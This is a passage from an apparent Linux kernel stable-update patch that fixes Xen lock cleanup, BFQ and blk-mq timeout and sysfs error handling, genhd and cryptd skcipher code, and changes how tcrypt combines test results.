+ 	 * CPUs are not activated, and lock_kicker_irq is not initialized.
+@@ -108,8 +110,6 @@ void xen_uninit_lock_cpu(int cpu)
+ 
+ 	unbind_from_irqhandler(irq, NULL);
+ 	per_cpu(lock_kicker_irq, cpu) = -1;
+-	kfree(per_cpu(irq_name, cpu));
+-	per_cpu(irq_name, cpu) = NULL;
+ }
+ 
+ PV_CALLEE_SAVE_REGS_THUNK(xen_vcpu_stolen);
+diff --git a/block/bfq-iosched.c b/block/bfq-iosched.c
+index 7ea427817f7f5..3e3bd1a466464 100644
+--- a/block/bfq-iosched.c
++++ b/block/bfq-iosched.c
+@@ -386,6 +386,12 @@ static void bfq_put_stable_ref(struct bfq_queue *bfqq);
+ 
+ void bic_set_bfqq(struct bfq_io_cq *bic, struct bfq_queue *bfqq, bool is_sync)
+ {
++	struct bfq_queue *old_bfqq = bic->bfqq[is_sync];
++
++	/* Clear bic pointer if bfqq is detached from this bic */
++	if (old_bfqq && old_bfqq->bic == bic)
++		old_bfqq->bic = NULL;
++
+ 	/*
+ 	 * If bfqq != NULL, then a non-stable queue merge between
+ 	 * bic->bfqq and bfqq is happening here. This causes troubles
+@@ -5377,7 +5383,6 @@ static void bfq_exit_icq_bfqq(struct bfq_io_cq *bic, bool is_sync)
+ 		unsigned long flags;
+ 
+ 		spin_lock_irqsave(&bfqd->lock, flags);
+-		bfqq->bic = NULL;
+ 		bfq_exit_bfqq(bfqd, bfqq);
+ 		bic_set_bfqq(bic, NULL, is_sync);
+ 		spin_unlock_irqrestore(&bfqd->lock, flags);
+@@ -6784,6 +6789,12 @@ static struct bfq_queue *bfq_init_rq(struct request *rq)
+ 				bfqq = bfq_get_bfqq_handle_split(bfqd, bic, bio,
+ 								 true, is_sync,
+ 								 NULL);
++				if (unlikely(bfqq == &bfqd->oom_bfqq))
++					bfqq_already_existing = true;
++			} else
++				bfqq_already_existing = true;
++
++			if (!bfqq_already_existing) {
+ 				bfqq->waker_bfqq = old_bfqq->waker_bfqq;
+ 				bfqq->tentative_waker_bfqq = NULL;
+ 
+@@ -6797,8 +6808,7 @@ static struct bfq_queue *bfq_init_rq(struct request *rq)
+ 				if (bfqq->waker_bfqq)
+ 					hlist_add_head(&bfqq->woken_list_node,
+ 						       &bfqq->waker_bfqq->woken_list);
+-			} else
+-				bfqq_already_existing = true;
++			}
+ 		}
+ 	}
+ 
+diff --git a/block/blk-cgroup.c b/block/blk-cgroup.c
+index ed761c62ad0a7..fcf9cf49f5de1 100644
+--- a/block/blk-cgroup.c
++++ b/block/blk-cgroup.c
+@@ -33,6 +33,7 @@
+ #include "blk-cgroup.h"
+ #include "blk-ioprio.h"
+ #include "blk-throttle.h"
++#include "blk-rq-qos.h"
+ 
+ /*
+  * blkcg_pol_mutex protects blkcg_policy[] and policy [de]activation.
+@@ -1275,6 +1276,7 @@ err_unlock:
+ void blkcg_exit_disk(struct gendisk *disk)
+ {
+ 	blkg_destroy_all(disk);
++	rq_qos_exit(disk->queue);
+ 	blk_throtl_exit(disk);
+ }
+ 
+diff --git a/block/blk-mq-sysfs.c b/block/blk-mq-sysfs.c
+index 93997d297d427..4515288fbe351 100644
+--- a/block/blk-mq-sysfs.c
++++ b/block/blk-mq-sysfs.c
+@@ -185,7 +185,7 @@ static int blk_mq_register_hctx(struct blk_mq_hw_ctx *hctx)
+ {
+ 	struct request_queue *q = hctx->queue;
+ 	struct blk_mq_ctx *ctx;
+-	int i, ret;
++	int i, j, ret;
+ 
+ 	if (!hctx->nr_ctx)
+ 		return 0;
+@@ -197,9 +197,16 @@ static int blk_mq_register_hctx(struct blk_mq_hw_ctx *hctx)
+ 	hctx_for_each_ctx(hctx, ctx, i) {
+ 		ret = kobject_add(&ctx->kobj, &hctx->kobj, "cpu%u", ctx->cpu);
+ 		if (ret)
+-			break;
++			goto out;
+ 	}
+ 
++	return 0;
++out:
++	hctx_for_each_ctx(hctx, ctx, j) {
++		if (j < i)
++			kobject_del(&ctx->kobj);
++	}
++	kobject_del(&hctx->kobj);
+ 	return ret;
+ }
+ 
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 228a6696d8351..0b855e033a834 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -1529,7 +1529,13 @@ static void blk_mq_rq_timed_out(struct request *req)
+ 	blk_add_timer(req);
+ }
+ 
+-static bool blk_mq_req_expired(struct request *rq, unsigned long *next)
++struct blk_expired_data {
++	bool has_timedout_rq;
++	unsigned long next;
++	unsigned long timeout_start;
++};
++
++static bool blk_mq_req_expired(struct request *rq, struct blk_expired_data *expired)
+ {
+ 	unsigned long deadline;
+ 
+@@ -1539,13 +1545,13 @@ static bool blk_mq_req_expired(struct request *rq, unsigned long *next)
+ 		return false;
+ 
+ 	deadline = READ_ONCE(rq->deadline);
+-	if (time_after_eq(jiffies, deadline))
++	if (time_after_eq(expired->timeout_start, deadline))
+ 		return true;
+ 
+-	if (*next == 0)
+-		*next = deadline;
+-	else if (time_after(*next, deadline))
+-		*next = deadline;
++	if (expired->next == 0)
++		expired->next = deadline;
++	else if (time_after(expired->next, deadline))
++		expired->next = deadline;
+ 	return false;
+ }
+ 
+@@ -1561,7 +1567,7 @@ void blk_mq_put_rq_ref(struct request *rq)
+ 
+ static bool blk_mq_check_expired(struct request *rq, void *priv)
+ {
+-	unsigned long *next = priv;
++	struct blk_expired_data *expired = priv;
+ 
+ 	/*
+ 	 * blk_mq_queue_tag_busy_iter() has locked the request, so it cannot
+@@ -1570,7 +1576,18 @@ static bool blk_mq_check_expired(struct request *rq, void *priv)
+ 	 * it was completed and reallocated as a new request after returning
+ 	 * from blk_mq_check_expired().
+ 	 */
+-	if (blk_mq_req_expired(rq, next))
++	if (blk_mq_req_expired(rq, expired)) {
++		expired->has_timedout_rq = true;
++		return false;
++	}
++	return true;
++}
++
++static bool blk_mq_handle_expired(struct request *rq, void *priv)
++{
++	struct blk_expired_data *expired = priv;
++
++	if (blk_mq_req_expired(rq, expired))
+ 		blk_mq_rq_timed_out(rq);
+ 	return true;
+ }
+@@ -1579,7 +1596,9 @@ static void blk_mq_timeout_work(struct work_struct *work)
+ {
+ 	struct request_queue *q =
+ 		container_of(work, struct request_queue, timeout_work);
+-	unsigned long next = 0;
++	struct blk_expired_data expired = {
++		.timeout_start = jiffies,
++	};
+ 	struct blk_mq_hw_ctx *hctx;
+ 	unsigned long i;
+ 
+@@ -1599,10 +1618,23 @@ static void blk_mq_timeout_work(struct work_struct *work)
+ 	if (!percpu_ref_tryget(&q->q_usage_counter))
+ 		return;
+ 
+-	blk_mq_queue_tag_busy_iter(q, blk_mq_check_expired, &next);
++	/* check if there is any timed-out request */
++	blk_mq_queue_tag_busy_iter(q, blk_mq_check_expired, &expired);
++	if (expired.has_timedout_rq) {
++		/*
++		 * Before walking tags, we must ensure any submit started
++		 * before the current time has finished. Since the submit
++		 * uses srcu or rcu, wait for a synchronization point to
++		 * ensure all running submits have finished
++		 */
++		blk_mq_wait_quiesce_done(q);
++
++		expired.next = 0;
++		blk_mq_queue_tag_busy_iter(q, blk_mq_handle_expired, &expired);
++	}
+ 
+-	if (next != 0) {
+-		mod_timer(&q->timeout, next);
++	if (expired.next != 0) {
++		mod_timer(&q->timeout, expired.next);
+ 	} else {
+ 		/*
+ 		 * Request timeouts are handled as a forward rolling timer. If
+diff --git a/block/genhd.c b/block/genhd.c
+index 0f9769db2de83..647f7d8d88312 100644
+--- a/block/genhd.c
++++ b/block/genhd.c
+@@ -530,6 +530,7 @@ out_unregister_queue:
+ 	rq_qos_exit(disk->queue);
+ out_put_slave_dir:
+ 	kobject_put(disk->slave_dir);
++	disk->slave_dir = NULL;
+ out_put_holder_dir:
+ 	kobject_put(disk->part0->bd_holder_dir);
+ out_del_integrity:
+@@ -629,6 +630,7 @@ void del_gendisk(struct gendisk *disk)
+ 
+ 	kobject_put(disk->part0->bd_holder_dir);
+ 	kobject_put(disk->slave_dir);
++	disk->slave_dir = NULL;
+ 
+ 	part_stat_set_all(disk->part0, 0);
+ 	disk->part0->bd_stamp = 0;
+diff --git a/crypto/cryptd.c b/crypto/cryptd.c
+index 668095eca0faf..ca3a40fc7da91 100644
+--- a/crypto/cryptd.c
++++ b/crypto/cryptd.c
+@@ -68,11 +68,12 @@ struct aead_instance_ctx {
+ 
+ struct cryptd_skcipher_ctx {
+ 	refcount_t refcnt;
+-	struct crypto_sync_skcipher *child;
++	struct crypto_skcipher *child;
+ };
+ 
+ struct cryptd_skcipher_request_ctx {
+ 	crypto_completion_t complete;
++	struct skcipher_request req;
+ };
+ 
+ struct cryptd_hash_ctx {
+@@ -227,13 +228,13 @@ static int cryptd_skcipher_setkey(struct crypto_skcipher *parent,
+ 				  const u8 *key, unsigned int keylen)
+ {
+ 	struct cryptd_skcipher_ctx *ctx = crypto_skcipher_ctx(parent);
+-	struct crypto_sync_skcipher *child = ctx->child;
++	struct crypto_skcipher *child = ctx->child;
+ 
+-	crypto_sync_skcipher_clear_flags(child, CRYPTO_TFM_REQ_MASK);
+-	crypto_sync_skcipher_set_flags(child,
+-				       crypto_skcipher_get_flags(parent) &
+-					 CRYPTO_TFM_REQ_MASK);
+-	return crypto_sync_skcipher_setkey(child, key, keylen);
++	crypto_skcipher_clear_flags(child, CRYPTO_TFM_REQ_MASK);
++	crypto_skcipher_set_flags(child,
++				  crypto_skcipher_get_flags(parent) &
++				  CRYPTO_TFM_REQ_MASK);
++	return crypto_skcipher_setkey(child, key, keylen);
+ }
+ 
+ static void cryptd_skcipher_complete(struct skcipher_request *req, int err)
+@@ -258,13 +259,13 @@ static void cryptd_skcipher_encrypt(struct crypto_async_request *base,
+ 	struct cryptd_skcipher_request_ctx *rctx = skcipher_request_ctx(req);
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct cryptd_skcipher_ctx *ctx = crypto_skcipher_ctx(tfm);
+-	struct crypto_sync_skcipher *child = ctx->child;
+-	SYNC_SKCIPHER_REQUEST_ON_STACK(subreq, child);
++	struct skcipher_request *subreq = &rctx->req;
++	struct crypto_skcipher *child = ctx->child;
+ 
+ 	if (unlikely(err == -EINPROGRESS))
+ 		goto out;
+ 
+-	skcipher_request_set_sync_tfm(subreq, child);
++	skcipher_request_set_tfm(subreq, child);
+ 	skcipher_request_set_callback(subreq, CRYPTO_TFM_REQ_MAY_SLEEP,
+ 				      NULL, NULL);
+ 	skcipher_request_set_crypt(subreq, req->src, req->dst, req->cryptlen,
+@@ -286,13 +287,13 @@ static void cryptd_skcipher_decrypt(struct crypto_async_request *base,
+ 	struct cryptd_skcipher_request_ctx *rctx = skcipher_request_ctx(req);
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct cryptd_skcipher_ctx *ctx = crypto_skcipher_ctx(tfm);
+-	struct crypto_sync_skcipher *child = ctx->child;
+-	SYNC_SKCIPHER_REQUEST_ON_STACK(subreq, child);
++	struct skcipher_request *subreq = &rctx->req;
++	struct crypto_skcipher *child = ctx->child;
+ 
+ 	if (unlikely(err == -EINPROGRESS))
+ 		goto out;
+ 
+-	skcipher_request_set_sync_tfm(subreq, child);
++	skcipher_request_set_tfm(subreq, child);
+ 	skcipher_request_set_callback(subreq, CRYPTO_TFM_REQ_MAY_SLEEP,
+ 				      NULL, NULL);
+ 	skcipher_request_set_crypt(subreq, req->src, req->dst, req->cryptlen,
+@@ -343,9 +344,10 @@ static int cryptd_skcipher_init_tfm(struct crypto_skcipher *tfm)
+ 	if (IS_ERR(cipher))
+ 		return PTR_ERR(cipher);
+ 
+-	ctx->child = (struct crypto_sync_skcipher *)cipher;
++	ctx->child = cipher;
+ 	crypto_skcipher_set_reqsize(
+-		tfm, sizeof(struct cryptd_skcipher_request_ctx));
++		tfm, sizeof(struct cryptd_skcipher_request_ctx) +
++		     crypto_skcipher_reqsize(cipher));
+ 	return 0;
+ }
+ 
+@@ -353,7 +355,7 @@ static void cryptd_skcipher_exit_tfm(struct crypto_skcipher *tfm)
+ {
+ 	struct cryptd_skcipher_ctx *ctx = crypto_skcipher_ctx(tfm);
+ 
+-	crypto_free_sync_skcipher(ctx->child);
++	crypto_free_skcipher(ctx->child);
+ }
+ 
+ static void cryptd_skcipher_free(struct skcipher_instance *inst)
+@@ -931,7 +933,7 @@ struct crypto_skcipher *cryptd_skcipher_child(struct cryptd_skcipher *tfm)
+ {
+ 	struct cryptd_skcipher_ctx *ctx = crypto_skcipher_ctx(&tfm->base);
+ 
+-	return &ctx->child->base;
++	return ctx->child;
+ }
+ EXPORT_SYMBOL_GPL(cryptd_skcipher_child);
+ 
+diff --git a/crypto/tcrypt.c b/crypto/tcrypt.c
+index a82679b576bb4..b23235d58a122 100644
+--- a/crypto/tcrypt.c
++++ b/crypto/tcrypt.c
+@@ -1090,15 +1090,6 @@ static void test_mb_skcipher_speed(const char *algo, int enc, int secs,
+ 			goto out_free_tfm;
+ 		}
+ 
+-
+-	for (i = 0; i < num_mb; ++i)
+-		if (testmgr_alloc_buf(data[i].xbuf)) {
+-			while (i--)
+-				testmgr_free_buf(data[i].xbuf);
+-			goto out_free_tfm;
+-		}
+-
+-
+ 	for (i = 0; i < num_mb; ++i) {
+ 		data[i].req = skcipher_request_alloc(tfm, GFP_KERNEL);
+ 		if (!data[i].req) {
+@@ -1471,387 +1462,387 @@ static int do_test(const char *alg, u32 type, u32 mask, int m, u32 num_mb)
+ 		}
+ 
+ 		for (i = 1; i < 200; i++)
+-			ret += do_test(NULL, 0, 0, i, num_mb);
++			ret = min(ret, do_test(NULL, 0, 0, i, num_mb));
+ 		break;
+ 
+ 	case 1:
+-		ret += tcrypt_test("md5");
++		ret = min(ret, tcrypt_test("md5"));
+ 		break;
+ 
+ 	case 2:
+-		ret += tcrypt_test("sha1");
++		ret = min(ret, tcrypt_test("sha1"));
+ 		break;
+ 
+ 	case 3:
+-		ret += tcrypt_test("ecb(des)");
+-		ret += tcrypt_test("cbc(des)");
+-		ret += tcrypt_test("ctr(des)");
++		ret = min(ret, tcrypt_test("ecb(des)"));
++		ret = min(ret, tcrypt_test("cbc(des)"));
++		ret = min(ret, tcrypt_test("ctr(des)"));
+ 		break;
+ 
+ 	case 4:
+-		ret += tcrypt_test("ecb(des3_ede)");
+-		ret += tcrypt_test("cbc(des3_ede)");
+-		ret += tcrypt_test("ctr(des3_ede)");
++		ret = min(ret, tcrypt_test("ecb(des3_ede)"));
++		ret = min(ret, tcrypt_test("cbc(des3_ede)"));
++		ret = min(ret, tcrypt_test("ctr(des3_ede)"));
+ 		break;
+ 
+ 	case 5:
+-		ret += tcrypt_test("md4");
++		ret = min(ret, tcrypt_test("md4"));
+ 		break;
+ 
+ 	case 6:
+-		ret += tcrypt_test("sha256");
++		ret = min(ret, tcrypt_test("sha256"));
+ 		break;
+ 
+ 	case 7:
+-		ret += tcrypt_test("ecb(blowfish)");
+-		ret += tcrypt_test("cbc(blowfish)");
+-		ret += tcrypt_test("ctr(blowfish)");
++		ret = min(ret, tcrypt_test("ecb(blowfish)"));
++		ret = min(ret, tcrypt_test("cbc(blowfish)"));
++		ret = min(ret, tcrypt_test("ctr(blowfish)"));
+ 		break;
+ 
+ 	case 8:
+-		ret += tcrypt_test("ecb(twofish)");
+-		ret += tcrypt_test("cbc(twofish)");
+-		ret += tcrypt_test("ctr(twofish)");
+-		ret += tcrypt_test("lrw(twofish)");
+-		ret += tcrypt_test("xts(twofish)");
++		ret = min(ret, tcrypt_test("ecb(twofish)"));
++		ret = min(ret, tcrypt_test("cbc(twofish)"));
++		ret = min(ret, tcrypt_test("ctr(twofish)"));
++		ret = min(ret, tcrypt_test("lrw(twofish)"));
++		ret = min(ret, tcrypt_test("xts(twofish)"));
+ 		break;
+ 
+ 	case 9:
+-		ret += tcrypt_test("ecb(serpent)");
+-		ret += tcrypt_test("cbc(serpent)");
+-		ret += tcrypt_test("ctr(serpent)");
+-		ret += tcrypt_test("lrw(serpent)");
+-		ret += tcrypt_test("xts(serpent)");
++		ret = min(ret, tcrypt_test("ecb(serpent)"));
++		ret = min(ret, tcrypt_test("cbc(serpent)"));
++		ret = min(ret, tcrypt_test("ctr(serpent)"));
++		ret = min(ret, tcrypt_test("lrw(serpent)"));
++		ret = min(ret, tcrypt_test("xts(serpent)"));
+ 		break;
+ 
+ 	case 10:
+-		ret += tcrypt_test("ecb(aes)");
+-		ret += tcrypt_test("cbc(aes)");
+-		ret += tcrypt_test("lrw(aes)");
+-		ret += tcrypt_test("xts(aes)");
+-		ret += tcrypt_test("ctr(aes)");
+-		ret += tcrypt_test("rfc3686(ctr(aes))");
+-		ret += tcrypt_test("ofb(aes)");
+-		ret += tcrypt_test("cfb(aes)");
+-		ret += tcrypt_test("xctr(aes)");
++		ret = min(ret, tcrypt_test("ecb(aes)"));
++		ret = min(ret, tcrypt_test("cbc(aes)"));
++		ret = min(ret, tcrypt_test("lrw(aes)"));
++		ret = min(ret, tcrypt_test("xts(aes)"));
++		ret = min(ret, tcrypt_test("ctr(aes)"));
++		ret = min(ret, tcrypt_test("rfc3686(ctr(aes))"));
++		ret = min(ret, tcrypt_test("ofb(aes)"));
++		ret = min(ret, tcrypt_test("cfb(aes)"));
++		ret = min(ret, tcrypt_test("xctr(aes)"));
+ 		break;
+ 
+ 	case 11:
+-		ret += tcrypt_test("sha384");
++		ret = min(ret, tcrypt_test("sha384"));
+ 		break;
+ 
+ 	case 12:
+-		ret += tcrypt_test("sha512");
++		ret = min(ret, tcrypt_test("sha512"));
+ 		break;
+ 
+ 	case 13:
+-		ret += tcrypt_test("deflate");
++		ret = min(ret, tcrypt_test("deflate"));
+ 		break;
+ 
+ 	case 14:
+-		ret += tcrypt_test("ecb(cast5)");
+-		ret += tcrypt_test("cbc(cast5)");
+-		ret += tcrypt_test("ctr(cast5)");
++		ret = min(ret, tcrypt_test("ecb(cast5)"));
++		ret = min(ret, tcrypt_test("cbc(cast5)"));
++		ret = min(ret, tcrypt_test("ctr(cast5)"));
+ 		break;
+ 
+ 	case 15:
+-		ret += tcrypt_test("ecb(cast6)");
+-		ret += tcrypt_test("cbc(cast6)");
+-		ret += tcrypt_test("ctr(cast6)");
+-		ret += tcrypt_test("lrw(cast6)");
+-		ret += tcrypt_test("xts(cast6)");
++		ret = min(ret, tcrypt_test("ecb(cast6)"));
++		ret = min(ret, tcrypt_test("cbc(cast6)"));
++		ret = min(ret, tcrypt_test("ctr(cast6)"));
++		ret = min(ret, tcrypt_test("lrw(cast6)"));
++		ret = min(ret, tcrypt_test("xts(cast6)"));
+ 		break;
+ 
+ 	case 16:
+-		ret += tcrypt_test("ecb(arc4)");
++		ret = min(ret, tcrypt_test("ecb(arc4)"));
+ 		break;
+ 
+ 	case 17:
+-		ret += tcrypt_test("michael_mic");
++		ret = min(ret, tcrypt_test("michael_mic"));
+ 		break;
+ 
+ 	case 18:
+-		ret += tcrypt_test("crc32c");
++		ret = min(ret, tcrypt_test("crc32c"));
+ 		break;
+ 
+ 	case 19:
+-		ret += tcrypt_test("ecb(tea)");
++		ret = min(ret, tcrypt_test("ecb(tea)"));
+ 		break;
+ 
+ 	case 20:
+-		ret += tcrypt_test("ecb(xtea)");
++		ret = min(ret, tcrypt_test("ecb(xtea)"));
+ 		break;
+ 
+ 	case 21:
+-		ret += tcrypt_test("ecb(khazad)");
++		ret = min(ret, tcrypt_test("ecb(khazad)"));
+ 		break;
+ 
+ 	case 22:
+-		ret += tcrypt_test("wp512");
++		ret = min(ret, tcrypt_test("wp512"));
+ 		break;
+ 
+ 	case 23:
+-		ret += tcrypt_test("wp384");
++		ret = min(ret, tcrypt_test("wp384"));
+ 		break;
+ 
+ 	case 24:
+-		ret += tcrypt_test("wp256");
++		ret = min(ret, tcrypt_test("wp256"));
+ 		break;
+ 
+ 	case 26:
+-		ret += tcrypt_test("ecb(anubis)");
+-		ret += tcrypt_test("cbc(anubis)");
++		ret = min(ret, tcrypt_test("ecb(anubis)"));
++		ret = min(ret, tcrypt_test("cbc(anubis)"));
+ 		break;
+ 
+ 	case 30:
+-		ret += tcrypt_test("ecb(xeta)");
++		ret = min(ret, tcrypt_test("ecb(xeta)"));
+ 		break;
+ 
+ 	case 31:
+-		ret += tcrypt_test("pcbc(fcrypt)");
++		ret = min(ret, tcrypt_test("pcbc(fcrypt)"));
+ 		break;
+ 
+ 	case 32:
+-		ret += tcrypt_test("ecb(camellia)");
+-		ret += tcrypt_test("cbc(camellia)");
+-		ret += tcrypt_test("ctr(camellia)");
+-		ret += tcrypt_test("lrw(camellia)");
+-		ret += tcrypt_test("xts(camellia)");
++		ret = min(ret, tcrypt_test("ecb(camellia)"));
++		ret = min(ret, tcrypt_test("cbc(camellia)"));
++		ret = min(ret, tcrypt_test("ctr(camellia)"));
++		ret = min(ret, tcrypt_test("lrw(camellia)"));
++		ret = min(ret, tcrypt_test("xts(camellia)"));
+ 		break;
+ 
+ 	case 33:
+-		ret += tcrypt_test("sha224");
++		ret = min(ret, tcrypt_test("sha224"));
+ 		break;
+ 
+ 	case 35:
+-		ret += tcrypt_test("gcm(aes)");
++		ret = min(ret, tcrypt_test("gcm(aes)"));
+ 		break;
+ 
+ 	case 36:
+-		ret += tcrypt_test("lzo");
++		ret = min(ret, tcrypt_test("lzo"));
+ 		break;
+ 
+ 	case 37:
+-		ret += tcrypt_test("ccm(aes)");
++		ret = min(ret, tcrypt_test("ccm(aes)"));
+ 		break;
+ 
+ 	case 38:
+-		ret += tcrypt_test("cts(cbc(aes))");
++		ret = min(ret, tcrypt_test("cts(cbc(aes))"));
+ 		break;
+ 
+         case 39:
+-		ret += tcrypt_test("xxhash64");
++		ret = min(ret, tcrypt_test("xxhash64"));
+ 		break;
+ 
+         case 40:
+-		ret += tcrypt_test("rmd160");
++		ret = min(ret, tcrypt_test("rmd160"));
+ 		break;
+ 
+ 	case 42:
+-		ret += tcrypt_test("blake2b-512");
++		ret = min(ret, tcrypt_test("blake2b-512"));
+ 		break;
+ 
+ 	case 43:
+-		ret += tcrypt_test("ecb(seed)");
++		ret = min(ret, tcrypt_test("ecb(seed)"));
+ 		break;
+ 
+ 	case 45:
+-		ret += tcrypt_test("rfc4309(ccm(aes))");
++		ret = min(ret, tcrypt_test("rfc4309(ccm(aes))"));
+ 		break;
+ 
+ 	case 46:
+-		ret += tcrypt_test("ghash");
++		ret = min(ret, tcrypt_test("ghash"));
+ 		break;
+ 
+ 	case 47:
+-		ret += tcrypt_test("crct10dif");
++		ret = min(ret, tcrypt_test("crct10dif"));
+ 		break;
+ 
+ 	case 48:
+-		ret += tcrypt_test("sha3-224");
++		ret = min(ret, tcrypt_test("sha3-224"));
+ 		break;
+ 
+ 	case 49:
+-		ret += tcrypt_test("sha3-256");
++		ret = min(ret, tcrypt_test("sha3-256"));
+ 		break;
+ 
+ 	case 50:
+-		ret += tcrypt_test("sha3-384");
++		ret = min(ret, tcrypt_test("sha3-384"));
+ 		break;
+ 
+ 	case 51:
+-		ret += tcrypt_test("sha3-512");
++		ret = min(ret, tcrypt_test("sha3-512"));
+ 		break;
+ 
+ 	case 52:
+-		ret += tcrypt_test("sm3");
++		ret = min(ret, tcrypt_test("sm3"));
+ 		break;
+ 
+ 	case 53:
+-		ret += tcrypt_test("streebog256");
++		ret = min(ret, tcrypt_test("streebog256"));
+ 		break;
+ 
+ 	case 54:
+-		ret += tcrypt_test("streebog512");
++		ret = min(ret, tcrypt_test("streebog512"));
+ 		break;
+ 
+ 	case 55:
+-		ret += tcrypt_test("gcm(sm4)");
++		ret = min(ret, tcrypt_test("gcm(sm4)"));
+ 		break;
+ 
+ 	case 56:
+-		ret += tcrypt_test("ccm(sm4)");
++		ret = min(ret, tcrypt_test("ccm(sm4)"));
+ 		break;
+ 
+ 	case 57:
+-		ret += tcrypt_test("polyval");
++		ret = min(ret, tcrypt_test("polyval"));
+ 		break;
+ 
+ 	case 58:
+-		ret += tcrypt_test("gcm(aria)");
++		ret = min(ret, tcrypt_test("gcm(aria)"));
+ 		break;
+ 
+ 	case 100:
+-		ret += tcrypt_test("hmac(md5)");
++		ret = min(ret, tcrypt_test("hmac(md5)"));
+ 		break;
+ 
+ 	case 101:
+-		ret += tcrypt_test("hmac(sha1)");
++		ret = min(ret, tcrypt_test("hmac(sha1)"));
+ 		break;
+ 
+ 	case 102:
+-		ret += tcrypt_test("hmac(sha256)");
++		ret = min(ret, tcrypt_test("hmac(sha256)"));
+ 		break;
+ 
+ 	case 103:
+-		ret += tcrypt_test("hmac(sha384)");
++		ret = min(ret, tcrypt_test("hmac(sha384)"));
+ 		break;
+ 
+ 	case 104:
+-		ret += tcrypt_test("hmac(sha512)");
++		ret = min(ret, tcrypt_test("hmac(sha512)"));
+ 		break;
+ 
+ 	case 105:
+-		ret += tcrypt_test("hmac(sha224)");
++		ret = min(ret, tcrypt_test("hmac(sha224)"));
+ 		break;
+ 
+ 	case 106:
+-		ret += tcrypt_test("xcbc(aes)");
++		ret = min(ret, tcrypt_test("xcbc(aes)"));
+ 		break;
+ 
+ 	case 108:
+-		ret += tcrypt_test("hmac(rmd160)");
++		ret = min(ret, tcrypt_test("hmac(rmd160)"));
+ 		break;
+ 
+ 	case 109:
+-		ret += tcrypt_test("vmac64(aes)");
++		ret = min(ret, tcrypt_test("vmac64(aes)"));
+ 		break;
+ 
+ 	case 111:
+-		ret += tcrypt_test("hmac(sha3-224)");
++		ret = min(ret, tcrypt_test("hmac(sha3-224)"));
+ 		break;
+ 
+ 	case 112:
+-		ret += tcrypt_test("hmac(sha3-256)");
++		ret = min(ret, tcrypt_test("hmac(sha3-256)"));
+ 		break;
+ 
+ 	case 113:
+-		ret += tcrypt_test("hmac(sha3-384)");
++		ret = min(ret, tcrypt_test("hmac(sha3-384)"));
+ 		break;
+ 
+ 	case 114:
+-		ret += tcrypt_test("hmac(sha3-512)");
++		ret = min(ret, tcrypt_test("hmac(sha3-512)"));
+ 		break;
+ 
+ 	case 115:
+-		ret += tcrypt_test("hmac(streebog256)");
++		ret = min(ret, tcrypt_test("hmac(streebog256)"));
+ 		break;
+ 
+ 	case 116:
+-		ret += tcrypt_test("hmac(streebog512)");
++		ret = min(ret, tcrypt_test("hmac(streebog512)"));
+ 		break;
+ 
+ 	case 150:
+-		ret += tcrypt_test("ansi_cprng");
++		ret = min(ret, tcrypt_test("ansi_cprng"));
+ 		break;
+ 
+ 	case 151:
+-		ret += tcrypt_test("rfc4106(gcm(aes))");
++		ret = min(ret, tcrypt_test("rfc4106(gcm(aes))"));
+ 		break;
+ 
+ 	case 152:
+-		ret += tcrypt_test("rfc4543(gcm(aes))");
++		ret = min(ret, tcrypt_test("rfc4543(gcm(aes))"));
+ 		break;
+ 
+ 	case 153:
+-		ret += tcrypt_test("cmac(aes)");
++		ret = min(ret, tcrypt_test("cmac(aes)"));
+ 		break;
+ 
+ 	case 154:
+-		ret += tcrypt_test("cmac(des3_ede)");
++		ret = min(ret, tcrypt_test("cmac(des3_ede)"));
+ 		break;
+ 
+ 	case 155:
+-		ret += tcrypt_test("authenc(hmac(sha1),cbc(aes))");
++		ret = min(ret, tcrypt_test("authenc(hmac(sha1),cbc(aes))"));
+ 		break;
+ 
+ 	case 156:
+-		ret += tcrypt_test("authenc(hmac(md5),ecb(cipher_null))");
++		ret = min(ret, tcrypt_test("authenc(hmac(md5),ecb(cipher_null))"));
+ 		break;
+ 
+ 	case 157:
+-		ret += tcrypt_test("authenc(hmac(sha1),ecb(cipher_null))");
++		ret = min(ret, tcrypt_test("authenc(hmac(sha1),ecb(cipher_null))"));
+ 		break;
+ 
+ 	case 158:
+-		ret += tcrypt_test("cbcmac(sm4)");
++		ret = min(ret, tcrypt_test("cbcmac(sm4)"));
+ 		break;
+ 
+ 	case 159:
+-		ret += tcrypt_test("cmac(sm4)");
++		ret = min(ret, tcrypt_test("cmac(sm4)"));
+ 		break;
+ 
+ 	case 181:
+-		ret += tcrypt_test("authenc(hmac(sha1),cbc(des))");
++		ret = min(ret, tcrypt_test("authenc(hmac(sha1),cbc(des))"));
+ 		break;
+ 	case 182:
+-		ret += tcrypt_test("authenc(hmac(sha1),cbc(des3_ede))");
++		ret = min(ret, tcrypt_test("authenc(hmac(sha1),cbc(des3_ede))"));
+ 		break;
+ 	case 183:
+-		ret += tcrypt_test("authenc(hmac(sha224),cbc(des))");
++		ret = min(ret, tcrypt_test("authenc(hmac(sha224),cbc(des))"));
+ 		break;
+ 	case 184:
+-		ret += tcrypt_test("authenc(hmac(sha224),cbc(des3_ede))");
++		ret = min(ret, tcrypt_test("authenc(hmac(sha224),cbc(des3_ede))"));
+ 		break;
+ 	case 185:
+-		ret += tcrypt_test("authenc(hmac(sha256),cbc(des))");
++		ret = min(ret, tcrypt_test("authenc(hmac(sha256),cbc(des))"));
+ 		break;
+ 	case 186:
+-		ret += tcrypt_test("authenc(hmac(sha256),cbc(des3_ede))");
++		ret = min(ret, tcrypt_test("authenc(hmac(sha256),cbc(des3_ede))"));
+ 		break;
+ 	case 187:
+-		ret += tcrypt_test("authenc(hmac(sha384),cbc(des))");
++		ret = min(ret, tcrypt_test("authenc(hmac(sha384),cbc(des))"));
+ 		break;
+ 	case 188:
+-		ret += tcrypt_test("authenc(hmac(sha384),cbc(des3_ede))");
++		ret = min(ret, tcrypt_test("authenc(hmac(sha384),cbc(des3_ede))"));
+ 		break;
+ 	case 189:
+-		ret += tcrypt_test("authenc(hmac(sha512),cbc(des))");
++		ret = min(ret, tcrypt_test("authenc(hmac(sha512),cbc(des))"));
+ 		break;
+ 	case 190:
+-		ret += tcrypt_test("authenc(hmac(sha512),cbc(des3_ede))");
++		ret = min(ret, tcrypt_test("authenc(hmac(sha512),cbc(des3_ede))"));
+ 		break;
+ 	case 191:
+-		ret += tcrypt_test("ecb(sm4)");
